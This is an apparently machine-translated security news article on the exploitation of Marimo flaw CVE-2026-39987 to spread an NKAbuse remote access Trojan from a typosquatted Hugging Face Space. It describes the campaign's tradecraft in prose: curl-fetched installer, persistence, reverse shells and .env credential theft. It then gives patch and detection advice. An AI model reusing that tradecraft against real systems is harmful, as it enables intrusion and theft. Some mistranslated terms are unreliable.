Vulnerability security alert CVE-2026-39987 in Marimo allows remote execution and deployment of NKAbuse via Hugging Face Spaces

In a matter of days, a wave of take-off on critical vulnerability was unleashed in Marimo, an interactive Python environment oriented to reactive notebooks, and the attackers have not been routed: they have used that failure to distribute a new variant of malware known as NKAbuse hosted in Hugging Face Space. What is worrying is not only the existence of the failure, but the speed with which it was exploited after the technical details were published., according to the follow-up carried out by the Sysdig cloud security firm.

The failure identified as CVE-2026-39987 allows remote code execution in vulnerable instances of Marimo. Sysdig documented exploitative attempts started less than 10 hours after technical disclosure, and since then he has observed campaigns that have evolved in both volume and techniques. One of the most striking tactics was the use of Hugging Face Spaces, the community platform to deploy demonstrations and IA tools from Git repositories, as a vector to serve malicious loads from a legitimate domain and with a clean reputation. You can expand the Sysdig follow-up reading in your technical report Here..

In the incidents observed, the malicious actor published a Space with a name that imitates legitimate tools ("vsccode-modetx," a clear VS Code typosquat) where he hosted an installer script and a binary called "kagent," which seeks to resemble legitimate Kubernetes orchestration agents. After exploiting the remote execution in Marimo, the attacker invoked a curl to that Space and executed the installer. The use of a legitimate endpoint like Hugging Face makes detection difficult because traffic is directed to a well-known and valid HTTPS-certified domain, which prevents shooting many automatic security alerts.

The installer downloaded the binary, deployed it locally and configured common persistence mechanisms in Linux and macOS, such as systemd units, scheduled tasks with cron or start agents in macOS. Sysdig analysis shows that the malware sample is an undocumented variant so far of NKAuse, a family that became known to take advantage of the NKN decentralized network to exchange data between nodes. Previous investigations, including those of Kaspersky, had described how NKAbuse used NKN and traversal techniques for their communications; the Sysdig report indicates that the new version acts rather as a remote access Trojan, capable of running shell commands on the engaged machine and returning results to the operator using patterns that include references to the NKN client protocol and components such as WebRTC / ICE / STUN for NAT traversry. You can consult NKAbuse materials in the Kaspersky community files at Securelist and to expand the context on the technique observed with the above-mentioned Sysdig report.

The holding has not been limited to the distribution of this binary. Sysdig also documented different operators that took advantage of the same failure for classic engagement tasks: reverse shells attempts through multiple ports, theft of credentials from environment files (.env), lateral connection to PostgreSQL databases to list schemas and tables, and attacks on Reds where session tokens and cachés were removed from the application. These behaviors show that attackers use the access obtained in many ways, from fraud and espionage to the construction of wider bots networks or the maintenance of persistent back doors.

If you manage environments that use Marimo, the operational recommendation is clear and urgent: it updates version 0.23.0 or more as soon as possible. Update is the most effective measure to close the door to this operating technique. When the update is not immediately feasible, blocking external access to endpoint / terminal / ws by firewall rules or completely disable it can significantly reduce the risk of remote execution. In addition, it is appropriate to lift exit controls (egress) that detect atypical discharges by curl or wget to third-party domains and to review systems in search of characteristic artifacts: binary with suspicious names, new service units, cron or LaunchAgens entries and unusual traffic associated with WebRTC / STUN. For more details about Hugging Face Spaces and its deployment model, official documentation is a good starting point: Hugging Face Spaces documentation.

On the strategic level, this episode again highlights two lessons that we should already have internalized: on the one hand, the speed with which critical vulnerabilities are exploited after their dissemination; on the other, the advantage that attackers get by using legitimate infrastructure to house their tools, which complicates detection based solely on the reputation of domains. The combination of agile parking, outbound network restrictions and detection of suspicious behaviour is the most reasonable defense in the face of such operations.

For those who need formal references on the vulnerability itself, the corresponding entry in the CVE database offers the public identifier and the traceability of the failure: CVE-2026-39987. And if you want to review the follow-up and technical indicators published by the researchers who monitored these campaigns, the Sysdig report is the most detailed source for now: Sysdig report.

If you are responsible for security or system management, act today: prioritize the update, repeat the exposed endpoints, block unreliable download routes and look for signs of persistence and abnormal communication. If your organization uses demonstration or deployment spaces from public repositories, review the permitted content policy and apply strict access and exit controls. In an ecosystem where IA and collaborative platforms are increasingly integrated, security cannot be left behind.